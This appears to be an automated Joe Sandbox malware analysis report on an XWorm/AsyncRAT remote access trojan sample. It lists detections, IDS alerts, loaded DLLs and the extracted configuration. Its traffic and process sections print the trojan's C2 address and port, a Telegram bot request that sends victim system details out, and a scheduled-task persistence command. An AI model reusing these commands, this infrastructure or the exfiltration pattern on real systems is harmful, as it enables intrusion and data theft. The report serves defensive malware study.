                                  2024-11-23T21:08:05.095467+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:35.150293+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:09:05.094644+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-11-23T21:08:03.766636+010028531931Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Antivirus / Scanner detection for submitted sample
                                  Source: WV7Gj9lJ7W.exeAvira: detected
                                  Antivirus detection for dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                                  Found malware configuration
                                  Source: WV7Gj9lJ7W.exeMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "104.198.168.179"], "Port": 1337, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                                  Multi AV Scanner detection for dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeReversingLabs: Detection: 76%
                                  Multi AV Scanner detection for submitted file
                                  Source: WV7Gj9lJ7W.exeReversingLabs: Detection: 76%
                                  AI detected suspicious sample
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                  Machine Learning detection for dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeJoe Sandbox ML: detected
                                  Machine Learning detection for sample
                                  Source: WV7Gj9lJ7W.exeJoe Sandbox ML: detected
                                  Sample uses string decryption to hide its real strings
                                  Source: WV7Gj9lJ7W.exeString decryptor: 127.0.0.1,104.198.168.179
                                  Source: WV7Gj9lJ7W.exeString decryptor: 1337
                                  Source: WV7Gj9lJ7W.exeString decryptor: <123456789>
                                  Source: WV7Gj9lJ7W.exeString decryptor: <Xwormmm>
                                  Source: WV7Gj9lJ7W.exeString decryptor: spoofer
                                  Source: WV7Gj9lJ7W.exeString decryptor: USB.exe
                                  Source: WV7Gj9lJ7W.exeString decryptor: %Temp%
                                  Source: WV7Gj9lJ7W.exeString decryptor: svchost.exe
                                  Source: WV7Gj9lJ7W.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
                                  Source: WV7Gj9lJ7W.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                                  Networking

                                  barindex
                                  Suricata IDS alerts for network traffic
                                  Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 104.198.168.179:1337
                                  Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 104.198.168.179:1337 -> 192.168.2.4:49732
                                  Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49732 -> 104.198.168.179:1337
                                  Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 104.198.168.179:1337 -> 192.168.2.4:49732
                                  Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 104.198.168.179:1337
                                  Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49731 -> 149.154.167.220:443
                                  C2 URLs / IPs found in malware configuration
                                  Source: Malware configuration extractorURLs: 127.0.0.1
                                  Source: Malware configuration extractorURLs: 104.198.168.179
                                  Uses the Telegram API (likely for C&C communication)
                                  Source: unknownDNS query: name: api.telegram.org
                                  Yara detected Generic Downloader
                                  Source: Yara matchFile source: WV7Gj9lJ7W.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                                  Source: global trafficTCP traffic: 192.168.2.4:49732 -> 104.198.168.179:1337
                                  Source: global trafficHTTP traffic detected: GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF723E1B88FDFE54EEC0E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NT2KM%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20spoofer HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                  Source: unknownDNS query: name: ip-api.com
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                                  Source: global trafficHTTP traffic detected: GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF723E1B88FDFE54EEC0E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NT2KM%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20spoofer HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 23 Nov 2024 20:05:09 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                  Source: WV7Gj9lJ7W.exe, svchost.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                                  Source: WV7Gj9lJ7W.exe, 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: WV7Gj9lJ7W.exe, svchost.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                  Operating System Destruction

                                  barindex
                                  Protects its processes via BreakOnTermination flag
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: 01 00 00 00 Jump to behavior

                                  System Summary

                                  barindex
                                  Malicious sample detected (through community Yara rule)
                                  Source: WV7Gj9lJ7W.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                                  Source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                  Source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                  Source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeCode function: 0_2_00007FFD9B8B17790_2_00007FFD9B8B1779
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeCode function: 0_2_00007FFD9B8B6FD20_2_00007FFD9B8B6FD2
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeCode function: 0_2_00007FFD9B8B62260_2_00007FFD9B8B6226
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeCode function: 0_2_00007FFD9B8B24F10_2_00007FFD9B8B24F1
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeCode function: 0_2_00007FFD9B8BFD040_2_00007FFD9B8BFD04
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeCode function: 0_2_00007FFD9B8B22590_2_00007FFD9B8B2259
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FFD9B8817793_2_00007FFD9B881779
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FFD9B8810FA3_2_00007FFD9B8810FA
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FFD9B8822593_2_00007FFD9B882259
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 5_2_00007FFD9B8A17795_2_00007FFD9B8A1779
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 5_2_00007FFD9B8A10FA5_2_00007FFD9B8A10FA
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 5_2_00007FFD9B8A22595_2_00007FFD9B8A2259
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 8_2_00007FFD9B8B17798_2_00007FFD9B8B1779
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 8_2_00007FFD9B8B10FA8_2_00007FFD9B8B10FA
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 8_2_00007FFD9B8B22598_2_00007FFD9B8B2259
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 9_2_00007FFD9B8A17799_2_00007FFD9B8A1779
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 9_2_00007FFD9B8A10FA9_2_00007FFD9B8A10FA
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 9_2_00007FFD9B8A22599_2_00007FFD9B8A2259
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 11_2_00007FFD9B89177911_2_00007FFD9B891779
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 11_2_00007FFD9B8910FA11_2_00007FFD9B8910FA
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 11_2_00007FFD9B89225911_2_00007FFD9B892259
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 13_2_00007FFD9B8B177913_2_00007FFD9B8B1779
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 13_2_00007FFD9B8B10FA13_2_00007FFD9B8B10FA
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 13_2_00007FFD9B8B225913_2_00007FFD9B8B2259
                                  Source: WV7Gj9lJ7W.exe, 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemapper.exe4 vs WV7Gj9lJ7W.exe
                                  Source: WV7Gj9lJ7W.exe, 00000000.00000000.1688650706.0000000000C18000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemapper.exe4 vs WV7Gj9lJ7W.exe
                                  Source: WV7Gj9lJ7W.exeBinary or memory string: OriginalFilenamemapper.exe4 vs WV7Gj9lJ7W.exe
                                  Source: WV7Gj9lJ7W.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: WV7Gj9lJ7W.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                  Source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                  Source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                  Source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                  Source: WV7Gj9lJ7W.exe, CAwAkHv2L9O24ZkL3o8yl2OMHnLL8juDUedYdDoMnoeapLDAWUrvcizzw9fV8raypt27ZJiYHXrCK.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: WV7Gj9lJ7W.exe, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: WV7Gj9lJ7W.exe, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: svchost.exe.0.dr, CAwAkHv2L9O24ZkL3o8yl2OMHnLL8juDUedYdDoMnoeapLDAWUrvcizzw9fV8raypt27ZJiYHXrCK.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: svchost.exe.0.dr, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: svchost.exe.0.dr, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: svchost.exe.0.dr, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: svchost.exe.0.dr, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: WV7Gj9lJ7W.exe, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: WV7Gj9lJ7W.exe, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: classification engineClassification label: mal100.troj.evad.winEXE@11/4@2/3
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeMutant created: NULL
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeMutant created: \Sessions\1\BaseNamedObjects\8zjo0ekcgEIZQvCP
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_03
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to behavior
                                  Source: WV7Gj9lJ7W.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: WV7Gj9lJ7W.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: WV7Gj9lJ7W.exeReversingLabs: Detection: 76%
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeFile read: C:\Users\user\Desktop\WV7Gj9lJ7W.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\WV7Gj9lJ7W.exe "C:\Users\user\Desktop\WV7Gj9lJ7W.exe"
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"
                                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"Jump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: sxs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: scrrun.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: linkinfo.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ntshrui.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: cscapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: avicap32.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: msvfw32.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: winmm.dllJump to behavior
